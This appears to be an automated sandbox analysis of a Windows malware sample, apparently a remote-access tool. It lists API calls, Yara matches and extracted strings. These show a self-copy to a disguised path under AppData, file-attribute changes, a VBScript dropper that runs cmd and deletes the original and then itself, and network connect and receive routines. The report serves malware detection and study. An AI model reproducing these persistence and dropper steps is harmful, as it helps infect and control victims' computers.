                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CED7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEE7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEF7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF07
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF17
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF27
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF37
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF47
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF51
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004B), ref: 0040CF68
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF74
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF80
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF8C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF98
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFA4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFB0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFBC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFC8
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFD4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFE0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFEC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFF8
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D004
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D010
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D01C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D028
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D034
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D040
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D04C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D058
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D064
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D070
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D07C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D088
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D094
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0A0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0B8
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0C4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0D0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0DC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0E8
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0F4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D100
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D10C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D118
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D124
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D130
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D13C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D148
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D154
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D160
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D16C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D178
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D184
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D190
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D19C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D1A8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D1B4
                                          • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                          • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                          • Part of subcall function 00402149: malloc.MSVCRT ref: 00402175
                                          • Part of subcall function 00402149: recv.WS2_32(0041BE70,00000000,000003E8,00000000), ref: 00402186
                                          • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                          • Part of subcall function 00402149: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                          • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                          • Part of subcall function 00402149: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                          • Part of subcall function 00402149: free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                          • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                          • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Disconnected!,?), ref: 0040D20B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040D21F
                                        • CreateThread.KERNEL32(00000000,00000000,00411A24,00000000,00000000,00000000), ref: 0040D240
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D249
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D252
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040D27E
                                        • atoi.MSVCRT ref: 0040D285
                                        • Sleep.KERNELBASE(00000000), ref: 0040D293
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$D@1@@$?c_str@?$basic_string@V01@@$G@2@@std@@G@std@@$V10@$V01@$??4?$basic_string@$atoi$?length@?$basic_string@SleepV10@@$?size@?$basic_string@CloseCountCreateG@1@@InfoLocaleOpenQueryThreadTickValueY?$basic_string@_itoafreegethostbynamehtonsmallocrecvsprintf
                                        • String ID: %I64u$2.7.2 Pro$C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe$Connected to $Connecting to $Disconnected!$[INFO]$name
                                        • API String ID: 43808216-1497891699
                                        Uniqueness Score: -1.00%

                                        APIs
                                        • wcslen.MSVCRT ref: 00407E46
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                        • CreateDirectoryW.KERNELBASE(00000000), ref: 00407E64
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407EC2
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                        • wcscmp.MSVCRT ref: 00407EE0
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407F1D
                                        • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,00000000), ref: 00407F25
                                        • wcslen.MSVCRT ref: 00407F40
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00415A24,?), ref: 00407F65
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415A24,?), ref: 00407F72
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F7D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F86
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F8F
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407FAB
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407FB4
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407FBE
                                        • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,00000000), ref: 00407FC6
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe), ref: 00407FD3
                                          • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407FE5
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408010
                                        • SetFileAttributesW.KERNEL32(00000000), ref: 0040801D
                                        • wcslen.MSVCRT ref: 00408022
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408034
                                        • SetFileAttributesW.KERNEL32(00000000), ref: 0040803B
                                        • _wgetenv.MSVCRT ref: 0040804B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408056
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408061
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040806C
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(WScript.Sleep 1000,?), ref: 0040807E
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject")), ref: 0040808C
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,?,00415628,0041623C), ref: 004080B0
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ,?,00415628,00000000), ref: 004080C4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080CF
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004080DC
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080E9
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080F6
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408102
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040810B
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408114
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040811D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408126
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040812F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408138
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 0040814B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,0041BA28,00000000), ref: 00408163
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040816E
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040817B
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408188
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408194
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040819D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081A6
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081AF
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081B8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081C1
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 004081CF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081DB
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004081E5
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081F1
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040820F
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040821C
                                        • exit.MSVCRT ref: 00408228
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408231
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040823A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$G@2@@0@Hstd@@V?$basic_string@$?c_str@?$basic_string@$V01@V10@$??0?$basic_string@G@1@@$V01@@$??4?$basic_string@$FileY?$basic_string@$V10@0@wcslen$AttributesCopy$?length@?$basic_string@CreateDirectoryExecuteShell_wgetenvexitwcscmp
                                        • String ID: """, 0$6$C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                                        • API String ID: 740851534-527989207
                                        • Opcode ID: 24be007b77389102dc2112617a33238c259527d6b97af79cdcea8e1b19f5812d
                                        • Instruction ID: 2c5ee03a622c4f430e0af795343514bbf493609e2573cf328c1cc28c00924062
                                        • Opcode Fuzzy Hash: 24be007b77389102dc2112617a33238c259527d6b97af79cdcea8e1b19f5812d
                                        • Instruction Fuzzy Hash: 57C15D7290051DEBCB04AFE0EC49DEE7B3CFF54345B44802AF916A71A0EB789945CB98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00409908() {
                                        				struct HINSTANCE__* _t1;
                                        				_Unknown_base(*)()* _t2;
                                        				_Unknown_base(*)()* _t22;
                                        
                                        				_t1 = LoadLibraryA("Psapi.dll"); // executed
                                        				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
                                        				 *0x41bc94 = _t2;
                                        				if(_t2 == 0) {
                                        					 *0x41bc94 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
                                        				}
                                        				 *0x41bc90 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
                                        				if( *0x41bc94 == 0) {
                                        					 *0x41bc90 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
                                        				}
                                        				 *0x41bca0 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
                                        				 *0x41c1e4 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                                        				 *0x41c1e8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
                                        				 *0x41bc98 = GetProcAddress(GetModuleHandleA("Shell32"), "IsUserAnAdmin");
                                        				 *0x41bcd0 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
                                        				 *0x41bca4 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
                                        				 *0x41bc78 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
                                        				 *0x41bca8 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
                                        				_t22 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
                                        				 *0x41bc9c = _t22;
                                        				return _t22;
                                        			}

                                        • Instruction addresses: 0x0040991b, 0x00409924, 0x0040992c, 0x00409933, 0x00409944, 0x00409944, 0x0040995f, 0x00409964, 0x00409975, 0x00409975, 0x00409993, 0x004099a7, 0x004099bb, 0x004099cf, 0x004099e3, 0x004099f7, 0x00409a0b, 0x00409a1c, 0x00409a24, 0x00409a28, 0x00409a2e

                                        APIs
                                        • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,0041BA38,0041BCB0,00000000,00408F24,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040991B
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409924
                                        • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040993F
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409942
                                        • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409953
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409956
                                        • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409970
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409973
                                        • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409984
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409987
                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409998
                                        • GetProcAddress.KERNEL32(00000000), ref: 0040999B
                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099AC
                                        • GetProcAddress.KERNEL32(00000000), ref: 004099AF
                                        • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099C0
                                        • GetProcAddress.KERNEL32(00000000), ref: 004099C3
                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099D4
                                        • GetProcAddress.KERNEL32(00000000), ref: 004099D7
                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099E8
                                        • GetProcAddress.KERNEL32(00000000), ref: 004099EB
                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099FC
                                        • GetProcAddress.KERNEL32(00000000), ref: 004099FF
                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A10
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409A13
                                        • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A21
